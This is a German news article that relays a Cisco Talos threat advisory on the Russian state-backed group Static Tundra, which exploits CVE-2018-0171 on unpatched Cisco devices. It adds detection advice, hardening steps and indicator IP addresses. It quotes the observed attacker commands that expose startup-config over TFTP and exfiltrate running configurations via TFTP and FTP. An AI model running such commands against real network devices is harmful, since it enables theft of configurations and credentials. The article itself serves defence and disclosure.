Russische Hacker nutzen Schwachstellen in Cisco-Geräten für Spionage

Cisco Talos warnt aktuell vor Angriffen der russischen Cyberspionagegruppe Static Tundra. Die staatlich geförderte Einheit kompromittiert ungepatchte und veraltete Netzwerkgeräte, deren Lebensdauer abgelaufen ist.

Die Gruppe gilt als Teil der FSB-Einheit „Center 16“ und ist seit mehr als zehn Jahren aktiv. Ihr Fokus liegt auf dem Eindringen in Netzwerkgeräte, um langfristig an Informationen zu gelangen. Dafür nutzt Static Tundra eine bekannte Schwachstelle (CVE-2018-0171) in der Smart-Install-Funktion der Cisco-IOS-Software. Obwohl diese bereits 2018 behoben wurde, sind zahlreiche Geräte weiterhin ungepatcht und damit anfällig. Ziel der Angriffe ist es, Konfigurationsdaten zu stehlen und dauerhaften Zugriff zu sichern.

Betroffen sind vor allem Organisationen aus Telekommunikation, Hochschulbildung und Fertigung in Nordamerika, Asien, Afrika und Europa. Die Auswahl der Opfer orientiert sich nach Einschätzung von Cisco Talos an deren strategischer Bedeutung für Russland.

Zum Einsatz kommen ausgefeilte Methoden, darunter das bereits 2015 bekannt gewordene Firmware-Implantat SYNful Knock sowie eigens entwickelte SNMP-Tools. Auf diese Weise gelingt es den Angreifern, über Jahre hinweg unentdeckt in Netzwerken zu bleiben.

Cisco Talos betont, dass die Gefahr über Russland hinausgeht: Auch andere staatlich geförderte Akteure könnten ähnliche Kampagnen durchführen. Unternehmen wird daher dringend geraten, die betroffene Sicherheitslücke zu schließen oder die Smart-Install-Funktion zu deaktivieren.

Cisco beobachtet die Aktivitäten von Static Tundra seit 2015 und stellt nun Empfehlungen zur Erkennung und Abwehr bereit.

Übersicht über den Bedrohungsakteur und die Kampagne

Talos geht mit hoher Sicherheit davon aus, dass Static Tundra eine von Russland staatlich geförderte Cyberspionagegruppe ist, die sich auf die Ausnutzung von Netzwerkgeräten spezialisiert hat, um langfristige Intrusion-Kampagnen gegen Organisationen durchzuführen, die für die russische Regierung von strategischem Interesse sind. Static Tundra ist wahrscheinlich eine Untergruppe einer anderen Gruppe, „Energetic Bear“ (auch bekannt als BERSERK BEAR), basierend auf Überschneidungen bei Taktiken, Techniken und Verfahren (TTPs) sowie der Viktimologie, was vom FBI bestätigt wurde. Energetic Bear wurde in einer Anklageschrift des US-Justizministeriums aus dem Jahr 2022 mit der Einheit „Center 16” des russischen Inlandsgeheimdienstes FSB in Verbindung gebracht. Talos geht außerdem mit mittlerer Sicherheit davon aus, dass Static Tundra mit der historischen Verwendung von „SYNful Knock” in Verbindung steht, einem bösartigen Implantat, das auf kompromittierten Cisco-Geräten installiert wurde und 2015 öffentlich bekannt wurde.

Static Tundra wird als hochentwickelter Cyber-Bedrohungsakteur eingeschätzt, der seit über einem Jahrzehnt tätig ist und langfristige Spionageoperationen durchführt. Static Tundra ist auf Netzwerkintrusionen spezialisiert, was sich in den fortgeschrittenen Kenntnissen der Gruppe über Netzwerkgeräte und der Verwendung maßgeschneiderter Tools zeigt, darunter möglicherweise das neuartige, aber mittlerweile schon zehn Jahre alte SYNful Knock-Router-Implantat.

Static Tundra zielt auf nicht gepatchte und oft veraltete Netzwerkgeräte ab, um Zugriff auf primäre Ziele zu erlangen und sekundäre Operationen gegen verwandte Ziele von Interesse zu unterstützen. Sobald sie den ersten Zugriff auf ein Netzwerkgerät erlangt haben, dringt Static Tundra weiter in die Zielumgebung vor, kompromittiert zusätzliche Netzwerkgeräte und richtet Kanäle für langfristige Persistenz und Informationsbeschaffung ein. Dies zeigt sich in der Fähigkeit der Gruppe, über mehrere Jahre hinweg unbemerkt Zugriff auf Zielumgebungen aufrechtzuerhalten.

Seit Jahren kompromittiert Static Tundra Cisco-Geräte, indem es eine bereits bekannte Schwachstelle in der Smart Install-Funktion der Cisco IOS-Software und der Cisco IOS XE-Software (CVE-2018-0171) ausnutzt, die oft nach dem Ende der Lebensdauer dieser Geräte nicht gepatcht wurde. Wir gehen davon aus, dass der Zweck dieser Kampagne darin besteht, Gerätekonfigurationsinformationen massenhaft zu kompromittieren und zu extrahieren, die später je nach den aktuellen strategischen Zielen und Interessen der russischen Regierung genutzt werden können. Dies zeigt sich in der Anpassung und Verlagerung des operativen Schwerpunkts von Static Tundra im Zuge der sich im Laufe der Zeit ändernden Prioritäten Russlands.

Seit Static Tundra erstmals 2015 beobachtet wurde, hat die Gruppe Organisationen in den Bereichen Telekommunikation, Hochschulbildung und Fertigung ins Visier genommen. Die Opfer befinden sich hauptsächlich in der Ukraine und verbündeten Ländern, aber auch andere Unternehmen weltweit sind betroffen. Talos geht davon aus, dass Static Tundra seine Netzwerkangriffe auf Organisationen von strategischem Interesse für Russland, insbesondere in den Bereichen Fertigung und Hochschulbildung, fortsetzen wird und dass politische Ziele weiterhin die Ukraine und ihre Verbündeten umfassen werden.

Cisco Talos: „Während sich dieser Blog auf die laufenden Kampagnen von Static Tundra gegen Netzwerkgeräte konzentriert, begehren auch viele andere staatlich geförderte Akteure den Zugang, den diese Geräte bieten, wie wir im Laufe der Jahre bereits mehrfach gewarnt haben. Unternehmen sollten sich bewusst sein, dass andere Advanced Persistent Threats (APTs) wahrscheinlich ebenfalls ähnliche Operationen priorisieren.“

Ziele und Opferprofil

Static Tundra zielt vor allem auf Organisationen in den Bereichen Telekommunikation, Hochschulbildung und Fertigung ab und passt seine Strategie im Laufe der Zeit an die sich wandelnden strategischen Interessen Russlands an. Die bekannten Opfer stammen aus verschiedenen Regionen, darunter Nordamerika, Asien, Afrika und Europa.

Eine der deutlicheren Verschiebungen der Zielausrichtung, die wir beobachtet haben, war die Eskalation der Aktivitäten von Static Tundra gegen Einrichtungen in der Ukraine zu Beginn des Krieges zwischen Russland und der Ukraine, die seitdem auf einem hohen Niveau geblieben sind. Static Tundra wurde dabei beobachtet, wie es ukrainische Organisationen in mehreren Branchen kompromittierte, im Gegensatz zu den zuvor eher begrenzten, selektiven Angriffen, die typischerweise mit diesem Bedrohungsakteur in Verbindung gebracht werden.

Taktiken, Techniken und Verfahren (TTPs)

Cisco Talos geht davon aus, dass Static Tundra zwei primäre operative Ziele verfolgt:

1) Kompromittierung von Netzwerkgeräten, um sensible Gerätekonfigurationsinformationen zu sammeln, die für zukünftige Operationen genutzt werden können, und

2) Einrichtung eines dauerhaften Zugriffs auf Netzwerkumgebungen, um langfristige Spionage im Einklang mit den strategischen Interessen Russlands zu unterstützen.

Aufgrund der weltweiten Präsenz der Cisco-Netzwerkinfrastruktur und des damit verbundenen potenziellen Zugriffs konzentriert sich die Gruppe stark auf die Ausnutzung dieser Geräte und möglicherweise auch auf die Entwicklung von Tools, um mit diesen Geräten zu interagieren und sich dort dauerhaft zu etablieren. Static Tundra verwendet maßgeschneiderte Tools, die Persistenz und Tarnung in den Vordergrund stellen, um diese Ziele zu erreichen. Die Tools und Techniken zielen auf alte und nicht gepatchte Edge-Geräte ab.

Erster Zugriff

Seit mindestens 2021 wurde beobachtet, dass Static Tundra aggressiv die Schwachstelle CVE-2018-0171 ausnutzt, eine bekannte und gepatchte Schwachstelle in der Cisco IOS-Software und der Cisco IOS XE-Software, die es einem nicht authentifizierten, entfernten Angreifer ermöglichen könnte, einen Neustart eines betroffenen Geräts auszulösen, was zu einer Denial-of-Service-Situation (DoS) führen würde, oder beliebigen Code auf einem betroffenen Gerät auszuführen.

Cisco hat 2018 einen Patch für CVE-2018-0171 veröffentlicht. Wie bereits von Cisco empfohlen, werden Kunden dringend gebeten, den Patch sofort zu installieren, da die Schwachstelle aktiv und kontinuierlich von hochentwickelten, staatlich geförderten oder staatsnahen APT-Gruppen (Active Persistent Threat) ausgenutzt wird. Geräte, deren Lebensdauer abgelaufen ist und die den Patch nicht unterstützen, erfordern zusätzliche Sicherheitsvorkehrungen, die im Sicherheitshinweis von 2018 beschrieben sind. Nicht gepatchte Geräte mit aktivierter Smart Install-Funktion sind weiterhin anfällig für diese und andere Angriffe, bis Kunden Maßnahmen ergreifen.

Talos geht mit mittlerer Sicherheit davon aus, dass Static Tundra maßgeschneiderte Tools einsetzt, um die Ausnutzung von CVE-2018-0171 und die anschließende Konfigurationsentnahme gegen eine vordefinierte Reihe von Ziel-IP-Adressen zu automatisieren, die wahrscheinlich mithilfe öffentlich verfügbarer Scandaten aus einem Dienst wie Shodan oder Censys gesammelt wurden. Der Prozess ähnelt denen, die öffentlich in Red-Teaming-Blogs und ähnlichen Publikationen beschrieben wurden.

Nach dem ersten Zugriff über die Smart Install-Sicherheitslücke setzt die CVE-2018-0171-Angriffskette von Static Tundra fort, indem ein Befehl ausgegeben wird, der die laufende Konfiguration ändert und den lokalen TFTP-Server (Trivial File Transfer Protocol) aktiviert:

tftp-server nvram:startup-config

Dadurch kann Static Tundra eine Folgeverbindung zum neu gestarteten TFTP-Server herstellen, um die Startkonfiguration abzurufen. Die extrahierte Konfiguration kann Anmeldedaten und/oder SNMP-Community-Strings (Simple Network Management Protocol) offenlegen, die dann für einen direkteren Zugriff auf das System genutzt werden können.

Es wurde auch beobachtet, dass Static Tundra den ersten Zugriff auf Geräte über SNMP herstellt und dabei eine Community-Zeichenfolge nutzt, die entweder bei einem früheren Angriff kompromittiert oder erraten wurde. In einigen Fällen verwendete die Gruppe unsichere Community-Zeichenfolgen wie „anonymous“ und „public“ mit Lese- und Schreibberechtigungen.

Ausführung

Nach dem ersten Zugriff auf eine Zielumgebung interagiert Static Tundra mit dem SNMP-Dienst unter Verwendung von Community-Strings, die während der ersten Zugriffsphase kompromittiert wurden. In einigen Fällen fälscht Static Tundra die Quelladresse des SNMP-Datenverkehrs. Diese Technik ermöglicht es dem Angreifer, seine Infrastruktur zu verschleiern und Zugriffskontrolllisten (ACLs) zu umgehen, da das SNMP-Protokoll keine Sitzungsaufbau verwendet. SNMP bietet eine Vielzahl von Optionen für die weitere Ausführung auf einem kompromittierten Gerät, z. B. die direkte Ausführung von Befehlen, die Änderung der laufenden Konfiguration und das Extrahieren der aktuell laufenden Konfiguration oder der Startkonfiguration.

Static Tundra nutzt SNMP, um Anweisungen zum Herunterladen einer Textdatei von einem Remote-Server zu senden und diese an die laufende Konfiguration anzuhängen. Dies kann zusätzliche Zugriffsmöglichkeiten über neu erstellte lokale Benutzerkonten in Verbindung mit der Aktivierung von Remote-Diensten wie TELNET ermöglichen.

Persistenz

Aufgrund der relativ statischen Natur von Netzwerkumgebungen ist Static Tundra häufig auf kompromittierte SNMP-Community-Strings und Anmeldedaten angewiesen, um über mehrere Jahre hinweg Zugriff auf Systeme zu erhalten. In einigen Fällen erstellt Static Tundra privilegierte lokale Benutzerkonten und/oder zusätzliche SNMP-Community-Strings mit Lese- und Schreibzugriff.

Es wurde beobachtet, dass Static Tundra ein Cisco IOS-Firmware-Implantat namens SYNful Knock nutzt, um dauerhaften Zugriff auf kompromittierte Systeme zu erlangen. SYNful Knock ist ein modulares Implantat, das Angreifer in ein Cisco IOS-Image einschleusen und dann auf das kompromittierte Gerät laden. Dies bietet eine heimliche Zugriffsmöglichkeit, die auch nach einem Neustart bestehen bleibt. Der Fernzugriff auf das Gerät kann dann durch Senden eines speziell gestalteten TCP-SYN-Pakets, das gemeinhin als „Magic Packet“ bezeichnet wird, erreicht werden. Weitere Informationen, einschließlich einer vollständigen technischen Beschreibung, finden Sie in einem Blogbeitrag von Mandiant aus dem Jahr 2015 mit zusätzlichen Details aus einem Blogbeitrag von Cisco aus dem Jahr 2015. Darüber hinaus hat Talos ein Skript veröffentlicht, mit dem das SYNful Knock-Implantat gescannt und erkannt werden kann.

Umgehung von Abwehrmaßnahmen

Es wurde beobachtet, dass Static Tundra die TACACS+-Konfiguration auf kompromittierten Geräten ändert und so die Fernprotokollierungsfunktionen behindert. Static Tundra ändert außerdem Zugriffskontrolllisten (ACLs), um den Zugriff von bestimmten IP-Adressen oder -Bereichen unter ihrer Kontrolle zu ermöglichen.

Entdeckung

Static Tundra verwendet wahrscheinlich öffentlich zugängliche Scandaten von Diensten wie Shodan oder Censys, um interessante Systeme zu identifizieren. Sobald es sich in einer Zielumgebung befindet, stützt sich Static Tundra stark auf native Befehle wie „show cdp neighbors“, um weitere interessante Systeme innerhalb der Zielumgebung aufzudecken. Dies ist eine relativ unauffällige Methode, um weitere Ziele zu identifizieren, ohne dass ein aktives Scannen erforderlich ist.

Sammlung

Eine der Hauptaktionen von Static Tundra bei seinen Zielen ist die Erfassung von Netzwerkverkehr, der aus Sicht der Informationsgewinnung von Wert ist. Zu diesem Zweck richtet Static Tundra GRE-Tunnel (Generic Routing Encapsulation) ein, die den interessierenden Datenverkehr an eine vom Angreifer kontrollierte Infrastruktur umleiten, wo er erfasst und weiter analysiert werden kann. Es wurde auch beobachtet, dass Static Tundra NetFlow-Daten auf kompromittierten Systemen sammelt und exfiltriert, wodurch Informationen über Quelle und Ziel potenziell interessanter Datenströme offengelegt werden.

Exfiltration

Static Tundra exfiltriert Konfigurationsinformationen auf verschiedene Weise, darunter eingehende TFTP-Verbindungen über das im Abschnitt „Erstzugriff“ erwähnte Smart Install-Exploit-Verfahren, ausgehende TFTP- oder FTP-Verbindungen vom kompromittierten Gerät zur vom Angreifer kontrollierten Infrastruktur und eingehende SNMP-Verbindungen unter Verwendung des Konfigurationskopierprozesses.

Static Tundra nutzt maßgeschneiderte SNMP-Tools und -Funktionen, die von CISCO-CONFIG-COPY-MIB bereitgestellt werden, um Konfigurationen von kompromittierten Geräten entweder über TFTP oder das Remote Copy Protocol (RCP) zu exfiltrieren.

Static Tundra wurde dabei beobachtet, wie es die folgenden Befehle verwendet, um Konfigurationsdateien über TFTP und FTP zu exfiltrieren:

do show running-config | redirect tftp://:/conf_bckp
copy running-config ftp://user:pass@/output.txt

Erkennung

Talos empfiehlt die folgenden Schritte, um verdächtige Aktivitäten zu identifizieren, die mit dieser Kampagne in Zusammenhang stehen könnten:

• Führen Sie eine umfassende Konfigurationsverwaltung (einschließlich Audits) gemäß den Best Practices durch.
• Führen Sie eine umfassende Überwachung der Authentifizierung, Autorisierung und Befehlsausführung durch.
• Überwachen Sie Syslog- und AAA-Protokolle auf ungewöhnliche Aktivitäten, einschließlich einer Abnahme der normalen Protokollierungsereignisse oder einer Lücke in den protokollierten Aktivitäten.
• Überwachen Sie Ihre Umgebung auf ungewöhnliche Änderungen im Verhalten oder in der Konfiguration.
• Erstellen Sie Profile (Fingerabdruck über NetFlow und Port-Scanning) von Netzwerkgeräten, um Änderungen in der Oberflächenansicht zu erkennen, einschließlich neuer Ports, die geöffnet/geschlossen werden, und Datenverkehr zu/von (nicht durchlaufend).
• Entwickeln Sie nach Möglichkeit NetFlow-Transparenz, um ungewöhnliche volumetrische Änderungen zu erkennen.
• Suchen Sie nach nicht leeren oder ungewöhnlich großen .bash_history-Dateien.

Zusätzliche Identifizierungs- und Erkennungsmaßnahmen können mithilfe der Cisco Forensic Guides durchgeführt werden.

Vorbeugende Maßnahmen

Die folgenden dringenden Empfehlungen gelten für Unternehmen aller Branchen.

• Cisco-spezifische Maßnahmen
  • Wenden Sie den Patch für CVE-2018-0171 an.
    • Deaktivieren Sie Smart Install wie im Hinweis angegeben, wenn ein Patch nicht möglich ist.
  • Nutzen Sie die Cisco Hardening Guides bei der Konfiguration von Geräten.
  • Deaktivieren Sie Telnet und stellen Sie sicher, dass es auf keiner der virtuellen Teletype-Leitungen (VTY) auf Cisco-Geräten verfügbar ist, indem Sie alle VTY-Stanzas mit „transport input ssh“ und „transport output none“ konfigurieren.
  • Deaktivieren Sie den Smart Install-Dienst von Cisco mit „no vstack“ für alle Geräte, auf denen die Anwendung des verfügbaren Patches für CVE 2018-0171 nicht möglich ist, und entwickeln Sie End-of-Life-Managementpläne für Technologien, die zu alt für Patches sind.
  • Verwenden Sie Passwörter vom Typ 8 für die Konfiguration lokaler Kontoanmeldedaten.
  • Verwenden Sie Typ 6 für die TACACS+-Schlüsselkonfiguration.
• Allgemeine Maßnahmen
  • Halten Sie sich strikt an bewährte Sicherheitsverfahren, einschließlich Aktualisierungen, Zugriffskontrollen, Benutzerschulungen und Netzwerksegmentierung.
  • Halten Sie sich über Sicherheitshinweise der US-Regierung und der Branche auf dem Laufenden und erwägen Sie die vorgeschlagenen Konfigurationsänderungen, um die beschriebenen Probleme zu beheben.
  • Aktualisieren Sie Geräte so schnell wie möglich. Dazu gehören das Patchen aktueller Hardware und Software gegen bekannte Schwachstellen sowie das Ersetzen von Hardware und Software, deren Lebensdauer abgelaufen ist.
    • Wählen Sie komplexe Passwörter und Community-Strings und vermeiden Sie Standard-Anmeldedaten.
  • Verwenden Sie Multi-Faktor-Authentifizierung (MFA).
  • Verschlüsseln Sie den gesamten Überwachungs- und Konfigurationsdatenverkehr (z. B. SNMPv3, HTTPS, SSH, NETCONF, RESTCONF).
  • Sperren und überwachen Sie Anmeldesysteme wie TACACS+ und alle Jump-Hosts streng.
  • Verwenden Sie AAA, um Konfigurationsänderungen an wichtigen Geräteschutzmaßnahmen (z. B. lokale Konten, TACACS+, RADIUS) zu verhindern.
  • Verhindern und überwachen Sie die Offenlegung von administrativen oder ungewöhnlichen Schnittstellen (z. B. SNMP, SSH, HTTP, HTTPS).
  • Deaktivieren Sie alle unverschlüsselten Web-Management-Funktionen.
  • Überprüfen Sie die Existenz und Richtigkeit von Zugriffskontrolllisten für alle Verwaltungsprotokolle (z. B. SNMP, SSH, Netconf usw.).
  • Speichern Sie Konfigurationen zentral und übertragen Sie sie auf die Geräte. Lassen Sie NICHT zu, dass Geräte als vertrauenswürdige Quelle für ihre Konfigurationen dienen.

Indicators of compromise (IOCs)

Indicator	Type	Known Activity
185.141.24[.]222	IP Address	2023/03/23
185.82.202[.]34	IP Address	2025/01/15 – 2025/02/28
185.141.24[.]28	IP Address	2024/10/01 – 2025/07/03
185.82.200[.]181	IP Address	2024/10/01 – 2024/11/15

Quelle: Cisco Talos-Blog

Weitere lesenswerte Artikel im Überblick

---

Bild/Quelle: https://depositphotos.com/de/home.html

Folgen Sie uns auf X

Folgen Sie uns auf Bluesky